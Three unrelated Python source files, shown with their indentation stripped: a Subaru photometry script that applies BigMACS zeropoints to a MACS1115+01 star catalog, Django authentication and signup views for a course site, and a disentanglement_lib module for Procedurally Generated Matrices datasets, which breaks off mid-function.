#adam-example# ipython -i -- adam_bigmacs_apply_zps_and_add_NFILT.py -i /nfs/slac/kipac/fs1/u/awright/SUBARU/photometry/MACS1115+01/PHOTOMETRY_W-C-RC_aper/MACS1115+01.stars.split_apers.cat -o /nfs/slac/kipac/fs1/u/awright/SUBARU/photometry/MACS1115+01/PHOTOMETRY_W-C-RC_aper/MACS1115+01.stars.calibrated_PureStarCalib.cat -z /nfs/slac/kipac/fs1/u/awright/SUBARU/photometry/MACS1115+01/PHOTOMETRY_W-C-RC_aper/MACS1115+01.bigmacs_cleaned_offsets-PureStarCalib.list
#####################
# Manually set a zeropoint for a fitid, such as from SLR
#####################
import sys, os, re,glob
sys.path.append('/u/ki/awright/quick/pythons/')
import imagetools, cattools
import header_key_add
import ldac, utilities
import astropy.io.fits as pyfits
import numpy
ns=globals()
######################
def calc_NFILT_with_numobs(catinput,mag_aper1_keys):
''' Calculate NFILT, this time properly accounting for everything'''
mag_aper1_sdr={} #get a system of distinct representatives (SDR)
for mag_key in mag_aper1_keys:
filt=mag_key[mag_key.find('W-'):]
if mag_aper1_sdr.has_key(filt):
mag_aper1_sdr[filt].append(mag_key)
else:
mag_aper1_sdr[filt]=[mag_key]
print 'mag_aper1_sdr=',mag_aper1_sdr
#catinput=ldac.openObjectFile(mag_fl)
catshape=catinput[mag_aper1_sdr.values()[0][0]].shape
NFILT_corrected=numpy.zeros(catshape,dtype=numpy.float32)
for filt in mag_aper1_sdr.keys():
mag_aper1_keys_clean=mag_aper1_sdr[filt]
observed_in_filt=numpy.zeros(catshape,dtype=bool)
printstr=[]
for mag_key in mag_aper1_keys_clean:
flux_key=mag_key.replace("MAG_APER1","FLUX_APER1")
fluxerr_key=flux_key.replace("FLUX","FLUXERR")
ef=catinput[fluxerr_key].copy()
observed=(ef>0.)
observed_in_filt+=observed
if len(mag_aper1_keys_clean)>1:
if mag_key.find('10_3')>0:
mag_key_10_3=mag_key
observed_10_3=observed.copy()
if mag_key.find('10_2')>0:
mag_key_10_2=mag_key
observed_10_2=observed.copy()
printstr+=['\t%s\t## observed: %i (of %i). Percentage: %.1f ## ' % (mag_key,observed.sum(),observed.__len__(),100*observed.mean())]
NFILT_corrected+=numpy.array(observed_in_filt,dtype=numpy.float32)
## check how the data looks
print '\n%s\n## observed_in_filt: %i (of %i). Percentage: %.1f ## ' % (filt,observed_in_filt.sum(),observed_in_filt.__len__(),100*observed_in_filt.mean())
## combine the different mags
if len(mag_aper1_keys_clean)>1:
print '\n'.join(printstr)
#mag_both=numpy.where(observed_10_2,catinput[mag_key_10_2],catinput[mag_key_10_3])
#flux_both=numpy.where(observed_10_2,catinput[mag_key_10_2.replace("MAG_APER1","FLUX_APER1")],catinput[mag_key_10_3.replace("MAG_APER1","FLUX_APER1")])
#emag_both=numpy.where(observed_10_2,catinput[mag_key_10_2.replace("MAG_APER1","MAGERR_APER1")],catinput[mag_key_10_3.replace("MAG_APER1","MAGERR_APER1")])
#eflux_both=numpy.where(observed_10_2,catinput[mag_key_10_2.replace("MAG_APER1","FLUXERR_APER1")],catinput[mag_key_10_3.replace("MAG_APER1","FLUXERR_APER1")])
return NFILT_corrected
######################
def getZP(zpfile):
try:
zpf = open(zpfile).readlines()
zps = {}
for line in zpf:
if line.startswith('#') or line.startswith('psf'):continue
tokens = line.split()
fitFilter = tokens[0]
zpoffset = float(tokens[1])
zperr = float(tokens[2])
zps[fitFilter] = (zpoffset, zperr)
return zps
except:
ns.update(locals())
raise
#######################
def main(flinput,flzps,flnew):
try:
filt_zp_err=getZP(flzps)
catinput=ldac.openObjectFile(flinput)
mag_aper1_keys=filt_zp_err.keys()
NFILT=calc_NFILT_with_numobs(catinput,mag_aper1_keys)
flproto=flinput.replace(".cat",".proto-tmp.cat")
other_keys_del=[] #this will get built up in the loop
ncs=[]
zp_tab_cols=[]
for mag_key in mag_aper1_keys:
zp,err_zp=filt_zp_err[mag_key]
col_zp=pyfits.Column(name='ZP_'+mag_key, format='E', array = numpy.array([zp]))
col_err_zp=pyfits.Column(name='ZPERR_'+mag_key, format='E', array = numpy.array([err_zp]))
zp_tab_cols.append( col_zp )
zp_tab_cols.append( col_err_zp )
## add zp,err_zp to image headers and get background/background_rms for this filter
filt=mag_key[mag_key.find('W-'):]
directory='/'.join([os.environ['SUBARUDIR'],os.environ['cluster'],filt,'SCIENCE','coadd_'+os.environ['cluster']+'_*'])
dirs=glob.glob(directory)
for dir in dirs:
if 'OLD' in dir:
continue
if not os.path.isfile(dir+"/coadd.fits"):
raise Exception("there is no file: "+dir+"/coadd.fits")
header_key_add.add_key_val(dir+"/coadd.fits",['ZP_BM','ZPERR_BM'],[zp,err_zp])
##adam-old get background_rms for this filter
##flcatcoadd='/'.join([os.environ['SUBARUDIR'],os.environ['cluster'],filt,'SCIENCE','coadd_'+os.environ['cluster']+'_all','coadd.stars.cat'])
##catcoadd=ldac.openObjectFile(flcatcoadd,"FIELDS")
##back_level=catcoadd["SEXBKGND"][0]
##back_rms=catcoadd["SEXBKDEV"][0]
## calibrate the catalog and conform to bpz input cat setup
#adam# now that I've determined how to distinguish sextractor non-detections and non-observations, apply that here
#adam# main thing I'd like to do is make MAGERR/FLUXERR, where MAG_APER1-*==-99 acceptable to bpz
#adam# My Hypthesis Confirmed by: ds9e ~/data/MACS1226+21/W-J-V/SCIENCE/coadd_MACS1226+21_all/coadd.fits & #load in ~/wtgpipeline/influx_m99_W-J-V.tsv
## calibrate and fix MAG_APER1- and FLUX_APER1-
flux_key=mag_key.replace("MAG_APER1","FLUX_APER1")
magerr_key=mag_key.replace("MAG","MAGERR")
fluxerr_key=flux_key.replace("FLUX","FLUXERR")
m=catinput[mag_key].copy()
if not m.ndim==1: raise Exception("this column doesn't seem to need to be split (shape is "+str(inmag.shape)+"), but it has APER- in the name. Thats weird and contradictory")
f=catinput[flux_key].copy()
em=catinput[magerr_key].copy()
ef=catinput[fluxerr_key].copy()
#mask=f<=0 ## m==-99 ## (mask==nondetected+nonobserved)=True
detected=(f>0.)
nondetected=(f<=0.)*(ef>0) #Flux <=0, meaningful phot. error
nonobserved=(ef<=0.) #Negative errors
frac_zp=10**(-.4*zp)
flux_newcol=f*frac_zp #((f==-99)==nonobserved).all()=True
flux_newcol[nonobserved]=-99
#adam-correct# I did think, briefly, that this was a mistake, but it's correct, the frac_zp is a multiplicative factor, so it get's multiplied to the error as well (that's not the case with the mags, because for them it's an additive factor, hence not affecting the uncertainty)
eflux_newcol=numpy.where(nonobserved,ef,ef*frac_zp)
# using mag=-2.5*numpy.log10(flux) after calibrating flux even though m+zp gives the same thing, because I should just use fluxes always since magnitudes cannot be trusted!
mag_newcol=-2.5*numpy.log10(flux_newcol) #=m+zp
# for sextractor, both nonobs and nondet are -99 (for bpz unobs=-99 and undet=+99)
mag_newcol[nonobserved+nondetected]=-99
f_bpz=flux_newcol.copy()
ef_bpz=eflux_newcol.copy()
# previously I'd had f_bpz[nonobserved+nondetected]=0, and that was wrong!
f_bpz[nonobserved]=0
ef_bpz[nonobserved]=0
#m_bpz=mag_newcol.copy()
#em_bpz=em.copy()
#m_bpz[nonobserved+nondetected]=0
#em_bpz[nonobserved]=0
#adam-new# do this check on the calculations to put my mind at ease
m_check=m.copy()+zp
m_check[nonobserved+nondetected]=-99
close_enough=numpy.array([imagetools.isclose(a,b,abs_tol=1e-5) for a,b in zip(mag_newcol,m_check)])
assert(close_enough.all())
#adam-old# Calculate NFILT
#detected=numpy.logical_not(nondetected+nonobserved)
#if len(ncs)==0: NFILT=numpy.zeros(detected.shape,dtype=numpy.float32)
#NFILT+=numpy.array(detected,dtype=numpy.float32)
## check how the data looks
print '\n%s\n## detected: %i ## nondetected: %i ## nonobserved: %i ## ' % (filt,detected.sum(),nondetected.sum(),nonobserved.sum())
print mag_key,' min,mean,max : ',mag_newcol[detected].min(),mag_newcol[detected].mean(),mag_newcol[detected].max()
print flux_key,' min,mean,max : ',flux_newcol[detected].min(),flux_newcol[detected].mean(),flux_newcol[detected].max()
print magerr_key,' min,mean,max : ',em[detected].min(),em[detected].mean(),em[detected].max()
print fluxerr_key,' min,mean,max : ',ef[detected].min(),ef[detected].mean(),ef[detected].max()
ncs.append(pyfits.Column(name=mag_key,format='1E',array=mag_newcol))
ncs.append(pyfits.Column(name=flux_key,format='1E',array=flux_newcol))
ncs.append(pyfits.Column(name=fluxerr_key,format='1E',array=eflux_newcol))
ncs.append(pyfits.Column(name=flux_key+"_bpz_inputs",format='1E',array=f_bpz))
ncs.append(pyfits.Column(name=fluxerr_key+"_bpz_inputs",format='1E',array=ef_bpz))
## no longer needed: fluxerr_newcol magerr_newcol
other_keys_del+=[ mag_key.replace("APER1-","APER-"), flux_key.replace("APER1-","APER-"), magerr_key.replace("APER1-","APER-"), fluxerr_key.replace("APER1-","APER-")]
### adam-old
##inmag=catinput[mag_key].copy()
##influx=catinput[flux_key].copy()
##magerr_newcol=catinput[magerr_key].copy()
##fluxerr_newcol=catinput[fluxerr_key].copy()
##mask=inmag==-99
##mag_newcol=inmag+zp
##non_obs=influx==-99
##non_det=(influx<0)*logical_not(non_obs)
##mag_newcol[non_det]=99
##mag_newcol[non_obs]=-99
##flux_newcol=10.0**(-.4*mag_newcol)# make FLUX_APER1- agree with MAG_APER1-
##flux_newcol[mask]=0 # all(mask==logical_or(non_det,non_obs)) = True
### calibrate and fix FLUXERR_APER1- and MAGERR_APER1-
##fluxerr_newcol[non_det]=back_rms*10**(-.4*zp) #since flux is background subtracted, 1sigma det lim = back_rms
##magerr_newcol[non_det]=-2.5*log10(back_rms)+zp #since flux is background subtracted, 1sigma det mag lim = -2.5*log10(back_rms)
##fluxerr_newcol[non_obs]=0
##magerr_newcol[non_obs]=0
##ncs.append(pyfits.Column(name=magerr_key,format='1E',array=magerr_newcol))
##ncs.append(pyfits.Column(name=fluxerr_key,format='1E',array=fluxerr_newcol))
### print out some of the details here:
##unmasked=logical_not(mask)
##print "\n"+filt+" background RMS=",back_rms," mag of 1sigma det lim =",-2.5*log10(back_rms)+zp
## now add NFILT to ncs and save flproto
ncs.append(pyfits.Column(name='NFILT', format = '1J', array = numpy.array(NFILT,dtype=numpy.int32)))
hdu = pyfits.PrimaryHDU()
hduSTDTAB = pyfits.BinTableHDU.from_columns(ncs)
hduZPSTAB = pyfits.BinTableHDU.from_columns(zp_tab_cols)
hdulist = pyfits.HDUList([hdu,hduSTDTAB,hduZPSTAB])
hdulist[1].header['EXTNAME']='OBJECTS'
hdulist[2].header['EXTNAME']='BIGMACS'
print "\n...temporarily saving to flproto=",flproto
hdulist.writeto(flproto,overwrite=True)
## make a version of flinput with the keys in flproto deleted so that it doesn't give an error in the ldacjoinkey command
## ALSO remove MAG_APER-/FLUX_APER-/MAGERR_APER-/FLUXERR_APER- so I don't confuse it for MAG_APER1-/... later
keys_del=[col.name for col in ncs if not col.name.endswith("_bpz_inputs") and not col.name=="NFILT"]+other_keys_del
flinput2cp=flinput.replace(".cat",".input-tmp.cat")
ooo=os.system("ldacdelkey -i "+flinput+" -o "+flinput2cp+" -k "+' '.join(keys_del))
if ooo!=0: raise Exception("the line os.system(ldacdelkey...) failed")
flnew2cp=flnew.replace(".cat",".new-tmp.cat")
keys_add=[col.name for col in ncs]
print "\nnow running: ldacjoinkey -p "+flproto+" -i "+flinput2cp+" -o "+flnew2cp+" -t OBJECTS -k "+' '.join(keys_add)
ooo=os.system("ldacjoinkey -p "+flproto+" -i "+flinput2cp+" -o "+flnew2cp+" -t OBJECTS -k "+' '.join(keys_add))
if ooo!=0: raise Exception("the line os.system("+"ldacjoinkey -p "+flproto+" -i "+flinput2cp+" -o "+flnew2cp+" -t OBJECTS -k "+" ".join(keys_add)+") failed")
## OK, now make the zps table and add it to the cat. example from photocalibrate_cat.py below
#adam-new# new table with ZPs
str_addtab="ldacaddtab -i "+flnew2cp+" -o "+flnew+" -p "+flproto+" -t BIGMACS"
print "\nnow running: "+str_addtab
ooo=os.system(str_addtab)
if ooo!=0: raise Exception("the line os.system("+str_addtab+") failed")
print "\nsaving to "+flnew
os.system("rm -f "+flproto)
os.system("rm -f "+flinput2cp)
os.system("rm -f "+flnew2cp)
ns.update(locals())
return
except:
ns.update(locals())
raise
#######################
if __name__ == '__main__':
import optparse
parser = optparse.OptionParser()
#example:
# parser.add_option('-3', '--threesec',
# dest='threesec',
# action='store_true',
# help='Treat as a 3second exposure',
# default=False)
#parser.add_option('-c', '--cluster', dest='cluster', help='Cluster name')
#parser.add_option('-f', '--filtername', dest='filter', help='Filter to calibrate')
#parser.add_option('-m', '--maindir', dest='maindir', help='subaru directory')
parser.add_option('-i', '--inputcat',
dest='input_fl',
help='input catalog with vector ldac objects.')
parser.add_option('-o', '--outputcat',
dest='output_fl',
help='output catalog name. ')
parser.add_option('-z', '--zeropoints',
dest='zeropoints_fl',
help='cleaned zeropoints list name. ')
from adam_quicktools_ArgCleaner import ArgCleaner
argv=ArgCleaner()
options, args = parser.parse_args(argv)
#if options.cluster is None:
# parser.error('Need to specify cluster!')
print "Called with:"
print options
if options.input_fl is None:
parser.error('Need to specify input catalog file!')
if options.output_fl is None:
parser.error('Need to specify output catalog file!')
if options.zeropoints_fl is None:
parser.error('Need to specify zeropoints catalog file!')
main(flinput=options.input_fl,flzps=options.zeropoints_fl,flnew=options.output_fl)
|
|
import waffle
from django.contrib import messages
from django.contrib.messages.api import add_message
from django.db.models import Q
from django.conf import settings
from django.http.response import HttpResponseRedirect
from django.http.response import Http404
from django.contrib.auth.models import User
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse, resolve
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_exempt
from social_core.actions import do_complete
from social_django.utils import psa, load_backend, load_strategy
from django.shortcuts import render, redirect, get_object_or_404
from django.contrib.auth import logout, login, REDIRECT_FIELD_NAME, authenticate
from social_core.backends.utils import load_backends, get_backend
from social_django.views import _do_login
from social_django.views import complete as social_complete
from social_core.exceptions import AuthMissingParameter
from accounts.models import Profile, Instructor
from core.common.utils import get_onboarding_percentage, get_redirect_url
from psa.custom_django_storage import CustomCode
from psa.utils import render_to
from psa.models import SecondaryEmail
from psa.forms import SignUpForm, EmailLoginForm, CompleteEmailForm
def context(**extra):
"""
Adding default context to rendered page.
"""
return dict({
'available_backends': load_backends(settings.AUTHENTICATION_BACKENDS),
}, **extra)
@render_to('psa/custom_login.html')
def validation_sent(request):
"""
View to handle validation_send action.
"""
user = request.user
social_list = []
email = request.session.get('email_validation_address')
if user and user.is_anonymous():
by_secondary = [i.provider.provider for i in
SecondaryEmail.objects.filter(email=email)
if not i.provider.provider == u'email']
social_list.extend(by_secondary)
users_by_email = User.objects.filter(email=email)
for user_by_email in users_by_email:
by_primary = [i.provider for i in
user_by_email.social_auth.all()
if not i.provider == u'email' and
not SecondaryEmail.objects.filter(
~Q(email=email), provider=i, user=user_by_email
).exists()]
social_list.extend(by_primary)
return context(
validation_sent=True,
email=email,
social_propose=bool(social_list),
social_list=social_list
)
def custom_login(request, template_name='psa/custom_login.html', login_form_cls=EmailLoginForm):
"""
Custom login to integrate social auth and default login.
"""
# Anyway we need checking this before defining next_page
next_page = request.POST.get('next') or request.GET.get('next')
if request.user.is_authenticated() and not request.user.is_anonymous():
return redirect(next_page or get_redirect_url(request.user))
u_hash_sess = request.session.get('u_hash')
# logout(request)
if u_hash_sess:
request.session['u_hash'] = u_hash_sess
kwargs = dict(available_backends=load_backends(settings.AUTHENTICATION_BACKENDS))
form_initial = {'u_hash': request.POST.get('u_hash')}
if next_page:
form_initial.update({
'next': next_page
})
if request.POST:
form = login_form_cls(request.POST, initial=form_initial)
if form.is_valid():
user = form.get_user()
if user is not None:
if user.is_active:
login(request, user)
return redirect(next_page or get_redirect_url(user))
else:
return redirect('inactive-user-error')
messages.error(request, "We could not authenticate you, please correct errors below.")
else:
form = login_form_cls(initial=form_initial)
kwargs['form'] = form
if next_page:
kwargs['next'] = next_page
return render(
request,
template_name,
kwargs
)
@never_cache
@csrf_exempt
@psa('ctms:email_sent')
def custom_complete(request, backend, u_hash, u_hash_sess, *args, **kwargs):
"""Authentication complete view"""
if u_hash and u_hash == u_hash_sess:
# if invited tester join course - create user immediately without confirmation email.
data = request.POST.dict().copy()
user = request.backend.strategy.create_user(**data)
user.backend = 'django.contrib.auth.backends.ModelBackend'
user = authenticate(username=user.username, password=data.get('password'))
login(request, user)
request.session['u_hash'] = u_hash
response = do_complete(
request.backend, _do_login, request.user,
redirect_name=REDIRECT_FIELD_NAME, *args, **kwargs)
if not u_hash or u_hash != u_hash_sess:
# if not invited tester join course - logout user
logout(request)
# add resend_user_email to the session to be able to resend link
request.session['resend_user_email'] = request.POST.get('email')
# getting just created CustomCode
cc = CustomCode.objects.filter(email=request.POST.get('email')).order_by('-id').first()
if cc:
request.session['cc_id'] = cc.id
# remove u_hash from session
request.session.pop('u_hash', None)
if request.user.is_authenticated():
Profile.check_tz(request)
return response
def signup(request):
"""
This function handles custom login to integrate social auth and default login.
"""
default_next_page = reverse('ctms:onboarding')
u_hash = request.POST.get('u_hash')
u_hash_sess = request.session.get('u_hash')
next_page = request.POST.get('next') or request.GET.get('next')
if request.user.is_authenticated() and not request.user.is_anonymous():
return redirect(next_page or get_redirect_url(request.user))
if u_hash and u_hash == u_hash_sess:
# if we have u_hash and it's equal with u_hash from session
# replacenexturl with shared_courses page url
if next_page:
request.session['next'] = next_page
form = SignUpForm(initial={'next': next_page, 'u_hash': u_hash})
kwargs = dict(available_backends=load_backends(settings.AUTHENTICATION_BACKENDS))
if request.POST:
data = request.POST.copy()
data['next'] = next_page if next_page else default_next_page
form = SignUpForm(data)
request.POST = data
if form.is_valid():
response = custom_complete(request, 'email', u_hash=u_hash, u_hash_sess=u_hash_sess)
return response
else:
messages.error(
request, "We could not create the account. Please review the errors below."
)
kwargs['form'] = form
kwargs['next'] = next_page
return render(request, 'psa/signup.html', kwargs)
def done(request):
"""
Login complete view, displays user data.
"""
@login_required
@render_to('ct/person.html')
def old_UI_wrap(request):
return context(person=request.user)
@login_required
def new_UI_wrap(request):
if not request.user.course_set.count():
# if newly created user - show create_course page
return HttpResponseRedirect(reverse('ctms:create_course'))
return HttpResponseRedirect(reverse('ctms:my_courses'))
# NOTE: IF USER has attached instructor instance will be redirected to /ctms/ (ctms dashboard)
if getattr(request.user, 'instructor', None):
return new_UI_wrap(request)
return old_UI_wrap(request)
@login_required
@render_to('ct/index.html')
def ask_stranger(request):
"""
View to handle stranger whend asking email.
"""
return context(tmp_email_ask=True)
@login_required
@render_to('ct/person.html')
def set_pass(request):
"""
View to handle password set / change action.
"""
changed = False
user = request.user
if user.is_authenticated():
if request.POST:
password = request.POST['pass']
confirm = request.POST['confirm']
if password == confirm:
user.set_password(password)
user.save()
changed = True
if changed:
return context(changed=True, person=user)
else:
return context(exception='Something goes wrong...', person=user)
def social_auth_complete(request, *args, **kwargs):
response = social_complete(request, *args, **kwargs)
if request.user.is_authenticated():
Profile.check_tz(request)
return response
def complete(request, *args, **kwargs):
data_to_use = request.POST or request.GET
form = SignUpForm(data_to_use)
post_data = request.POST.copy()
post_data.pop('csrfmiddlewaretoken', None)
# if there's only email and csrf field in POST - it's login by email.
if len(post_data.keys()) == 1 and 'email' in post_data:
login_by_email = True
form = CompleteEmailForm(request.POST)
if form.is_valid():
post_data.update({
'first_name': '',
'last_name': '',
'institution': '',
})
request.POST = post_data
else:
login_by_email = False
if form.is_valid() or 'verification_code' in request.GET:
try:
resp = social_complete(request, 'email', *args, **kwargs)
if not ('confirm' in request.POST or login_by_email) and request.user.is_authenticated():
Profile.check_tz(request)
return resp
except AuthMissingParameter:
messages.error(request, 'Email already verified.')
if request.user.is_authenticated():
Profile.check_tz(request)
return redirect('ctms:my_courses')
else:
# add message with transformed form errors
err_msg = "\n".join([
"{} - {}".format(
k.capitalize(), ", ".join(i.lower() for i in v)
)
for k, v in form.errors.items()
])
messages.error(
request,
"You passed not correct data. {}".format(err_msg)
)
# if form is not valid redirect user to page where he came from
return redirect(reverse("login"))
def login_as_user(request, user_id):
if (request.user.is_authenticated and
request.user.is_staff and
request.user.groups.filter(name='CAN_LOGIN_AS_OTHER_USER').first()
):
user = get_object_or_404(User, id=user_id)
logout(request)
user.backend = 'django.contrib.auth.backends.ModelBackend'
login(request, user)
add_message(request, messages.SUCCESS, "You just switched to user {} with email {}".format(
user.username, user.email
))
return redirect('ct:home')
else:
raise Http404("This action is not allowed")
def inactive_user_error(request):
return render(request, 'accounts/inactive_user_login_error.html')
|
|
# coding=utf-8
# Copyright 2018 The DisentanglementLib Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Data sets of Procedurally Generated Matrices (PGMs).
For a description, pleaser refer to https://arxiv.org/abs/1905.12506.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from disentanglement_lib.data.ground_truth import dsprites
from disentanglement_lib.data.ground_truth import dummy_data
from disentanglement_lib.data.ground_truth import ground_truth_data as gtd
from disentanglement_lib.data.ground_truth import named_data
from disentanglement_lib.data.ground_truth import shapes3d
from disentanglement_lib.evaluation.abstract_reasoning import pgm_utils
from disentanglement_lib.utils import resources
from disentanglement_lib.visualize import visualize_util
import gin
import numpy as np
from PIL import Image
import tensorflow.compat.v1 as tf
@gin.configurable("pgm")
def get_pgm_dataset(pgm_type=gin.REQUIRED):
"""Returns a named PGM data set."""
ground_truth_data = named_data.get_named_ground_truth_data()
# Quantization for specific data sets (as described in
# https://arxiv.org/abs/1905.12506).
if isinstance(ground_truth_data, dsprites.AbstractDSprites):
wrapped_data_set = Quantizer(ground_truth_data, [5, 6, 3, 3, 4, 4])
elif isinstance(ground_truth_data, shapes3d.Shapes3D):
wrapped_data_set = Quantizer(ground_truth_data, [10, 10, 10, 4, 4, 4])
elif isinstance(ground_truth_data, dummy_data.DummyData):
wrapped_data_set = ground_truth_data
else:
raise ValueError("Invalid data set.")
# We support different ways to generate PGMs for each of the data set (e.g.,
# `easy_1`, `hard_3`, `easy_mixes`). `easy` and `hard` refers to the way the
# alternative solutions of the PGMs are generated:
# - `easy`: Alternative answers are random other solutions that do not
# satisfy the constraints in the given PGM.
# - `hard`: Alternative answers are unique random modifications of the
# correct solution which makes the task substantially harder.
if pgm_type.startswith("easy"):
sampling = "easy"
elif pgm_type.startswith("hard"):
sampling = "hard"
else:
raise ValueError("Invalid sampling strategy.")
# The suffix determines how many relations there are:
# - 1-3: Specifies whether always 1, 2, or 3 relations are constant in each
# row.
# - `mixed`: With probability 1/3 each, 1, 2, or 3 relations are constant
# in each row.
if pgm_type.endswith("1"):
relations_dist = [1., 0., 0.]
elif pgm_type.endswith("2"):
relations_dist = [0., 1., 0.]
elif pgm_type.endswith("3"):
relations_dist = [0., 0., 1.]
elif pgm_type.endswith("mixed"):
relations_dist = [1. / 3., 1. / 3., 1. / 3.]
else:
raise ValueError("Invalid number of relations.")
return PGMDataset(
wrapped_data_set,
sampling_strategy=sampling,
relations_dist=relations_dist)
class PGMDataset(object):
"""Class that contains PGM data set based on a GroundTruthData."""
def __init__(self, ground_truth_data, sampling_strategy, relations_dist):
"""Creates a PGMDataset.
Args:
ground_truth_data: GroundTruthData data set used to generate images.
sampling_strategy: Either `easy` or `hard`. For `easy`, alternative
answers are random other solutions that do not satisfy the constraints
in the given PGM. For `hard`, alternative answers are unique random
modifications of the correct solution which makes the task harder.
relations_dist: List with probabilites where the i-th element contains the
probability that i relations are enforced.
"""
self.ground_truth_data = ground_truth_data
self.relations_dist = relations_dist
self.sampling_strategy = sampling_strategy
def sample(self, random_state):
"""Returns a random PGMInstance."""
# Sample the number of relations.
num_relations = 1 + random_state.choice(
len(self.relations_dist), p=self.relations_dist)
# Construct the PGM solution in the space of ground-truth factors.
pgm = pgm_utils.PGM(
random_state,
num_relations,
self.ground_truth_data.factors_num_values,
)
# Sample instances of the images for the solutions and alternative answers.
solution = []
for row in pgm.matrix:
solution.append(
self.ground_truth_data.sample_observations_from_factors(
row, random_state))
alternatives = self.ground_truth_data.sample_observations_from_factors(
pgm.other_solutions, random_state)
# Sample the position of the correct answer.
position = random_state.choice(alternatives.shape[0] + 1)
# Return the instance.
return PGMInstance(
np.array(solution), alternatives, position, pgm.matrix,
pgm.other_solutions, self.ground_truth_data.factors_num_values)
def tf_data_set(self, seed):
"""Returns a tf.data.Dataset.
Args:
seed: Integer with the random seed used to initialize the data set.
Returns.
tf.data.Dataset of the data set.
"""
def generator():
# We need to hard code the random seed so that the data set can be reset.
random_state = np.random.RandomState(seed)
while True:
instance = self.sample(random_state)
yield instance.training_sample()
# We sample a single example to obtain the actual shapes and dtypes.
features, _ = self.sample(np.random.RandomState(0)).training_sample()
features_shapes = {k: v.shape for k, v in features.items()}
features_types = {k: v.dtype for k, v in features.items()}
output_shapes = (features_shapes, tf.TensorShape([]))
output_types = (features_types, tf.int64)
return tf.data.Dataset.from_generator(
generator, output_types=output_types, output_shapes=output_shapes)
def make_input_fn(self, seed, num_batches=None):
"""Creates an input function for the TPU Estimator."""
def input_fn(params):
"""TPUEstimator compatible input fuction."""
dataset = self.tf_data_set(seed)
batch_size = params["batch_size"]
# We need to drop the remainder as otherwise we lose the batch size in the
# tensor shape. This has no effect as our data set is infinite.
dataset = dataset.batch(batch_size, drop_remainder=True)
if num_batches is not None:
dataset = dataset.take(num_batches)
return dataset.make_one_shot_iterator().get_next()
return input_fn
class PGMInstance(object):
"""Class that holds instance of an image PGM."""
def __init__(self,
solution,
alternatives,
position,
solution_factors=None,
alternatives_factors=None,
num_factor_values=None):
"""Constructs a PGMInstance.
Args:
solution: Numpy array of shape (num_rows, num_cols, width, height,
channels) with the images of the PGM solution.
alternatives: Numpy array of shape (num_alternatives, width, height,
channels) with the images of the alternatives.
position: Integer with position where solution should be inserted.
solution_factors: Numpy array of shape (num_rows, num_cols, num_factors)
with the factors of the PGM solution.
alternatives_factors: Numpy array of shape (num_alternatives, num_factors)
with the images of the alternatives.
num_factor_values: List with the number of values for each factor.
"""
self.solution = solution
self.alternatives = alternatives
self.position = position
self.solution_factors = solution_factors
self.alternatives_factors = alternatives_factors
self.num_factor_values = num_factor_values
def get_context(self):
"""Returns the context.
Returns:
Numpy array of shape (num_rows*num_cols - 1, width, height, channels).
"""
context = []
for row in self.solution:
context += list(row)
return np.array(context[:-1], dtype=np.float32)
def get_answers(self):
"""Returns the answers.
Returns:
Numpy array of shape (num_alternatives + 1, width, height, channels).
"""
result = list(self.alternatives)
result.insert(self.position, self.solution[-1, -1])
return np.array(result, dtype=np.float32)
def get_context_factor_values(self):
"""Returns the context ground truth factos as integer values.
Returns:
Numpy array of shape (num_rows*num_cols - 1, len(num_factor_values).
"""
context = []
for row in self.solution_factors:
context += list(row)
return np.array(context[:-1])
def get_answers_factor_values(self):
"""Returns the answers ground truth factos as integer values.
Returns:
Numpy array of shape (num_alternatives + 1, len(num_factor_values).
"""
result = list(self.alternatives_factors)
result.insert(self.position, self.solution_factors[-1, -1])
return np.array(result)
def range_embed_factors(self, factors):
"""Embeds the factors linearly in [-0.5, 0.5] based on integer values.
Args:
factors: Numpy array of shape (:, len(num_factor_values) with factors.
Returns:
Numpy array of shape (:, len(num_factor_values) with floats.
"""
result = np.array(factors, dtype=np.float32)
max_vals = np.array(self.num_factor_values, dtype=np.float32) - 1.
result /= np.expand_dims(max_vals, 0)
return result - .5
def onehot_embed_factors(self, factors):
"""Embeds the factors as one-hot vectors.
Args:
factors: Numpy array of shape (:, len(num_factor_values) with factors.
Returns:
Numpy array of shape (:, sum(num_factor_values) with floats.
"""
result = []
for i, num in enumerate(self.num_factor_values):
result.append(onehot(factors[:, i], num))
return np.array(np.concatenate(result, axis=-1), dtype=np.float32)
def training_sample(self):
"""Returns a single training example."""
sample = {}
sample["context"] = self.get_context()
sample["answers"] = self.get_answers()
if self.solution_factors is not None:
context_factors = self.get_context_factor_values()
answers_factors = self.get_answers_factor_values()
sample["context_factor_values"] = self.range_embed_factors(
context_factors)
sample["answers_factor_values"] = self.range_embed_factors(
answers_factors)
sample["context_factors_onehot"] = self.onehot_embed_factors(
context_factors)
sample["answers_factors_onehot"] = self.onehot_embed_factors(
answers_factors)
return sample, self.position
def make_image(self, answer=False, padding_px=8, border_px=4):
"""Creates an image of the PGMInstance."""
# Create the question side that contains the progression matrix.
question = np.copy(self.solution)
if question.shape[-1] == 1:
question = np.repeat(question, 3, -1)
if not answer:
question[-1, -1] = question_mark()
# Build up the image on the context side.
rows = []
for i in range(question.shape[0]):
row = []
for j in range(question.shape[1]):
# Do the border around the image.
color = np.array([1., 1., 1.])
if answer and i == (question.shape[0] - 1) and j == (question.shape[1] -
1):
color = COLORS["green"]
row.append(
visualize_util.pad_around(question[i, j], border_px, value=color))
rows.append(visualize_util.padded_stack(row, padding_px, axis=1))
question_image = visualize_util.padded_stack(rows, padding_px)
separator = np.zeros((question_image.shape[0], 2, question_image.shape[2]))
# Create the answer side.
answers = self.get_answers()
if answers.shape[-1] == 1:
answers = np.repeat(answers, 3, -1)
answers_with_border = []
for i, image in enumerate(answers):
color = np.array([1., 1., 1.])
if answer:
color = COLORS["green"] if i == self.position else COLORS["red"]
answers_with_border.append(
visualize_util.pad_around(image, border_px, value=color))
answer_image = visualize_util.padded_grid(answers_with_border,
question.shape[0], padding_px)
center_crop = visualize_util.padded_stack(
[question_image, separator, answer_image], padding_px, axis=1)
return visualize_util.pad_around(
